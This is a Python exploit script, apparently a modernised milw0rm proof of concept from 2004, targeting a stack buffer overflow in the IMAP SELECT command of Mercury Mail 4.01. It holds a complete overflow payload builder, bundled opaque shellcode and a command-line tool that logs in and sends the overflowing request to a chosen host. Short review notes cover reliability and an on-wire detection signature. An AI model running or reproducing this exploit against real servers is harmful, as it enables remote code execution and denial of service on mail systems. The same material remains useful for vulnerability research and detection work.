Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit by h3m4n


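#########################################################
#                                                       #
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow      #
# Discovered by : Muts                                  #
# Coded by : Muts                                       #
# WWW.WHITEHAT.CO.IL                                    #
# Plain vanilla stack overflow in the SELECT command    #
#                                                       #
#########################################################
"""Mercury Mail 4.01 (Pegasus) IMAP SELECT stack overflow PoC.

Flow, unchanged from the original script: connect to IMAP (tcp/143),
send a LOGIN, wait, then send a SELECT whose mailbox argument is
``pad + saved-return-address + NOP sled + shellcode``.  The overflow
offset (260 bytes) and the return address are the original author's
values; the return address is specific to the target build and must be
adjusted for the host being tested.

Review notes:
  * The script authenticates before issuing SELECT, so as written this
    is a post-authentication trigger.  Whether the server would also
    accept SELECT before LOGIN is not something this script shows.
  * The original never checked the LOGIN reply.  No greeting is read
    before LOGIN is sent, so the first recv() most likely returns the
    server banner rather than the LOGIN result; a wrong password would
    not stop the overflow from being sent.  ``exploit()`` now returns
    the bytes received after SELECT so a caller can look at them, but
    it still does not parse IMAP responses.
  * Rewritten for Python 3: wire data is ``bytes``, the socket is
    closed by a context manager, and a timeout is set so a target that
    dies mid-request does not hang the script forever.
  * For detection purposes the on-wire signature is a SELECT whose
    argument is a long run of 0x41, a 4-byte address, 32 x 0x90 and
    an opaque blob -- nothing a real mailbox name looks like.
"""
import argparse
import socket
import struct
from time import sleep

# Shellcode carried by the original PoC.  Its author describes it as a
# "lame calc.exe" payload -- treat that as the author's label, not as a
# verified fact about what it does.
SC2 = (
    b"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
    b"\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
    b"\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
    b"\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
    b"\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
    b"\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
    b"\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
    b"\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
    b"\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
    b"\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
    b"\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
    b"\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"
)

PAD_LEN = 260             # filler bytes before the saved return address
NOP_LEN = 32              # NOP sled between the return address and SC2
DEFAULT_RET = 0x782F28F7  # original author's value -- change as needed
DEFAULT_HOST = "192.168.1.167"
DEFAULT_PORT = 143
DEFAULT_USER = b"ftp"
DEFAULT_PASS = b"ftp"
RECV_SIZE = 1024


def build_buffer(ret_addr=DEFAULT_RET, shellcode=SC2, pad_len=PAD_LEN, nop_len=NOP_LEN):
    """Return the SELECT argument that overwrites the saved return address.

    Layout: ``pad_len`` bytes of 0x41, then ``ret_addr`` as a little-endian
    unsigned 32-bit value, then ``nop_len`` bytes of 0x90, then ``shellcode``.

    Args:
        ret_addr: address written over the saved return address; must fit
            in an unsigned 32-bit field.
        shellcode: bytes appended after the NOP sled.
        pad_len: number of filler bytes before the return address.
        nop_len: length of the NOP sled.

    Returns:
        The complete payload as ``bytes``.

    Raises:
        ValueError: if ``ret_addr`` is outside 0..0xFFFFFFFF or either
            length is negative.
    """
    # struct.pack would also reject an out-of-range address, but with a
    # less useful message; check explicitly so the CLI error is clear.
    if not 0 <= ret_addr <= 0xFFFFFFFF:
        raise ValueError("ret_addr must fit in 32 bits: %#x" % ret_addr)
    if pad_len < 0 or nop_len < 0:
        raise ValueError("pad_len and nop_len must be non-negative")
    return (
        b"\x41" * pad_len
        + struct.pack("<L", ret_addr)
        + b"\x90" * nop_len
        + bytes(shellcode)
    )


def exploit(host=DEFAULT_HOST, port=DEFAULT_PORT, user=DEFAULT_USER,
            password=DEFAULT_PASS, ret_addr=DEFAULT_RET, timeout=10.0,
            delay=3.0):
    """Send LOGIN and then the overflowing SELECT to ``host:port``.

    Args:
        host: target IMAP server.
        port: target TCP port (143 in the original).
        user: login name as ``bytes`` (``b"ftp"`` in the original).
        password: password as ``bytes`` (``b"ftp"`` in the original).
        ret_addr: value for :func:`build_buffer`.
        timeout: socket timeout in seconds for connect/send/recv.
        delay: seconds to wait between LOGIN and SELECT (3 in the
            original; its purpose is not stated there).

    Returns:
        The bytes received after the SELECT, or ``b""`` if the server
        timed out or reset the connection.  A timeout/reset here is
        consistent with -- but not proof of -- the service crashing.

    Raises:
        OSError: if the TCP connection or the LOGIN exchange fails.
    """
    payload = build_buffer(ret_addr)
    print("\nSending evil buffer...")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"a001 LOGIN " + user + b" " + password + b"\r\n")
        # NOTE(review): the greeting was never read, so this is most likely
        # the banner rather than the LOGIN result -- authentication is not
        # verified before the overflow goes out.
        sock.recv(RECV_SIZE)
        sleep(delay)
        sock.sendall(b"A001 SELECT " + payload + b"\r\n")
        try:
            data = sock.recv(RECV_SIZE)
        except (socket.timeout, ConnectionError):
            data = b""
    print("\nDone! ")
    return data


def main(argv=None):
    """CLI entry point: ``exploit.py [host] [-p PORT] [-r RET] [-u USER] [-P PASS]``.

    Defaults reproduce the original hard-coded values so running the script
    with no arguments behaves as before.
    """
    parser = argparse.ArgumentParser(
        description="Mercury Mail 4.01 (Pegasus) IMAP SELECT buffer overflow PoC")
    parser.add_argument("host", nargs="?", default=DEFAULT_HOST,
                        help="target host (default %s)" % DEFAULT_HOST)
    parser.add_argument("-p", "--port", type=int, default=DEFAULT_PORT,
                        help="target port (default %d)" % DEFAULT_PORT)
    # int(v, 0) accepts both "0x782f28f7" and decimal.
    parser.add_argument("-r", "--ret", type=lambda v: int(v, 0), default=DEFAULT_RET,
                        help="return address to overwrite with (default %#x)" % DEFAULT_RET)
    parser.add_argument("-u", "--user", default=DEFAULT_USER.decode(),
                        help="IMAP login name")
    parser.add_argument("-P", "--password", default=DEFAULT_PASS.decode(),
                        help="IMAP password")
    args = parser.parse_args(argv)
    exploit(args.host, args.port, args.user.encode(), args.password.encode(), args.ret)


if __name__ == "__main__":
    main()

# milw0rm.com [2004-11-29]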



muts                                                                                     11/29/2004

								
To top